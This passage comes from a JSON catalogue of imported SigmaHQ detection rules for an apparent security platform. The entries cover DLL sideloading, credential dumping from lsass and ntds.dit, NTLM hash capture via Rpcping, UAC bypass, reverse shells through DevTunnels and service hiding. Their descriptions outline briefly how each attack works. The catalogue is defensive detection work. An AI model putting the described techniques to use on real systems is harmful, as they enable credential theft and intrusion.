"92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" } }, { "id": "sigmahq-sigma-9313dc13-d04c-46d8-af4a-a930cc55d93b", "type": "detection", "name": "Potential DLL Sideloading Via VMware Xfer", "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-vmware-xfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmware_xfer.yml" } }, { "id": "sigmahq-sigma-93199800-b52a-4dec-b762-75212c196542", "type": "detection", "name": "PUA - RunXCmd Execution", "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-runxcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93199800-b52a-4dec-b762-75212c196542", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml" } }, { "id": "sigmahq-sigma-932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "type": "detection", "name": "Audio Capture via PowerShell", "description": "Detects audio capture via PowerShell Cmdlet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" } }, { "id": "sigmahq-sigma-93671f99-04eb-4ab4-a161-70d446a84003", "type": "detection", "name": "Capture Credentials with Rpcping.exe", "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capture-credentials-with-rpcping-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93671f99-04eb-4ab4-a161-70d446a84003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" } }, { "id": "sigmahq-sigma-9386d78a-7207-4048-9c9f-a93a7c2d1c05", "type": "detection", "name": "Code Execution via Pcwutl.dll", "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/code-execution-via-pcwutl-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" } }, { "id": "sigmahq-sigma-93a19907-d4f9-4deb-9f91-aac4692776a6", "type": "detection", "name": "UAC Bypass Using .NET Code Profiler on MMC", "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-net-code-profiler-on-mmc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93a19907-d4f9-4deb-9f91-aac4692776a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" } }, { "id": "sigmahq-sigma-93d298a1-d28f-47f1-a468-d971e7796679", "type": "detection", "name": "Disable Tamper Protection on Windows Defender", "description": "Detects disabling Windows Defender Tamper Protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-tamper-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93d298a1-d28f-47f1-a468-d971e7796679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" } }, { "id": "sigmahq-sigma-93d94efc-d7ad-4161-ad7d-1638c4f908d8", "type": "detection", "name": "HackTool - Dumpert Process Dumper Default File", "description": "Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-dumpert-process-dumper-default-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_dumpert.yml" } }, { "id": "sigmahq-sigma-93e0ef48-37c8-49ed-a02c-038aab23628e", "type": "detection", "name": "Azure Container Registry Created or Deleted", "description": "Detects when a Container Registry is created or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-container-registry-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "93e0ef48-37c8-49ed-a02c-038aab23628e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-941e5c45-cda7-4864-8cea-bbb7458d194a", "type": "detection", "name": "Suspicious Remote Logon with Explicit Credentials", "description": "Detects suspicious processes logging on with explicit credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-remote-logon-with-explicit-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" } }, { "id": "sigmahq-sigma-944e8941-f6f6-4ee8-ac05-1c224e923c0e", "type": "detection", "name": "Add Port Monitor Persistence in Registry", "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-port-monitor-persistence-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" } }, { "id": "sigmahq-sigma-944f6adb-7a99-4c69-80c1-b712579e93e6", "type": "detection", "name": "Suspicious Browser Activity", "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-browser-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "944f6adb-7a99-4c69-80c1-b712579e93e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" } }, { "id": "sigmahq-sigma-9465ddf4-f9e4-4ebd-8d98-702df3a93239", "type": "detection", "name": "IIS Native-Code Module Command Line Installation", "description": "Detects suspicious IIS native-code module installations via command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-native-code-module-command-line-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml" } }, { "id": "sigmahq-sigma-94771a71-ba41-4b6e-a757-b531372eaab6", "type": "detection", "name": "File Download From Browser Process Via Inline URL", "description": "Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-browser-process-via-inline-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94771a71-ba41-4b6e-a757-b531372eaab6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml" } }, { "id": "sigmahq-sigma-948a0953-f287-4806-bbcb-3b2e396df89f", "type": "detection", "name": "Unsigned Mfdetours.DLL Sideloading", "description": "Detects DLL sideloading of unsigned \"mfdetours.dll\". Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-mfdetours-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "948a0953-f287-4806-bbcb-3b2e396df89f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml" } }, { "id": "sigmahq-sigma-9494bff8-959f-4440-bbce-fb87a208d517", "type": "detection", "name": "Changes to Device Registration Policy", "description": "Monitor and alert for changes to the device registration policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changes-to-device-registration-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9494bff8-959f-4440-bbce-fb87a208d517", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml" } }, { "id": "sigmahq-sigma-949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "type": "detection", "name": "Explorer Process Tree Break", "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/explorer-process-tree-break.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" } }, { "id": "sigmahq-sigma-94a66f46-5b64-46ce-80b2-75dcbe627cc0", "type": "detection", "name": "Roles Activation Doesn't Require MFA", "description": "Identifies when a privilege role can be activated without performing mfa.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-activation-doesn-t-require-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94a66f46-5b64-46ce-80b2-75dcbe627cc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml" } }, { "id": "sigmahq-sigma-94dc4390-6b7c-4784-8ffc-335334404650", "type": "detection", "name": "Dump Ntds.dit To Suspicious Location", "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dump-ntds-dit-to-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "94dc4390-6b7c-4784-8ffc-335334404650", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml" } }, { "id": "sigmahq-sigma-9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "type": "detection", "name": "Network Connection Initiated To DevTunnels Domain", "description": "Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.001", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-devtunnels-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_devtunnels.yml" } }, { "id": "sigmahq-sigma-95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "type": "detection", "name": "HackTool - RedMimicry Winnti Playbook Execution", "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1059.003", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-redmimicry-winnti-playbook-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml" } }, { "id": "sigmahq-sigma-951f8d29-f2f6-48a7-859f-0673ff105e6f", "type": "detection", "name": "CodeIntegrity - Unsigned Kernel Module Loaded", "description": "Detects the presence of a loaded unsigned kernel module on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unsigned-kernel-module-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "951f8d29-f2f6-48a7-859f-0673ff105e6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" } }, { "id": "sigmahq-sigma-9525dc73-0327-438c-8c04-13c0e037e9da", "type": "detection", "name": "Regsvr32 Execution From Potential Suspicious Location", "description": "Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-execution-from-potential-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9525dc73-0327-438c-8c04-13c0e037e9da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml" } }, { "id": "sigmahq-sigma-952ed57c-8f99-453d-aee0-53a49c22f95d", "type": "detection", "name": "Potential AVKkid.DLL Sideloading", "description": "Detects potential DLL sideloading of \"AVKkid.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-avkkid-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "952ed57c-8f99-453d-aee0-53a49c22f95d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_avkkid.yml" } }, { "id": "sigmahq-sigma-95361ce5-c891-4b0a-87ca-e24607884a96", "type": "detection", "name": "Binary Padding - MacOS", "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-padding-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "95361ce5-c891-4b0a-87ca-e24607884a96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_binary_padding.yml" } }, { "id": "sigmahq-sigma-953945c5-22fe-4a92-9f8a-a9edc1e522da", "type": "detection", "name": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/abuse-of-service-permissions-to-hide-services-via-set-service-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" } }, { "id": "sigmahq-sigma-953d460b-f810-420a-97a2-cfca4c98e602", "type": "detection", "name": "Source Code Enumeration Detection by Keyword", "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/source-code-enumeration-detection-by-keyword.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "953d460b-f810-420a-97a2-cfca4c98e602", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_source_code_enumeration.yml" } }, { "id": "sigmahq-sigma-9541f321-7cba-4b43-80fc-fbd1fb922808", "type": "detection", "name": "Azure Kubernetes Cluster Created or Deleted", "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-cluster-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9541f321-7cba-4b43-80fc-fbd1fb922808", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_cluster_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-954f0af7-62dd-418f-b3df-a84bc2c7a774", "type": "detection", "name": "New Remote Desktop Connection Initiated Via Mstsc.EXE", "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-remote-desktop-connection-initiated-via-mstsc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml" } }, { "id": "sigmahq-sigma-9577edbb-851f-4243-8c91-1d5b50c1a39b", "type": "detection", "name": "Atbroker Registry Change", "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/atbroker-registry-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" } }, { "id": "sigmahq-sigma-95afc12e-3cbb-40c3-9340-84a032e596a3", "type": "detection", "name": "Service Registry Permissions Weakness Check", "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 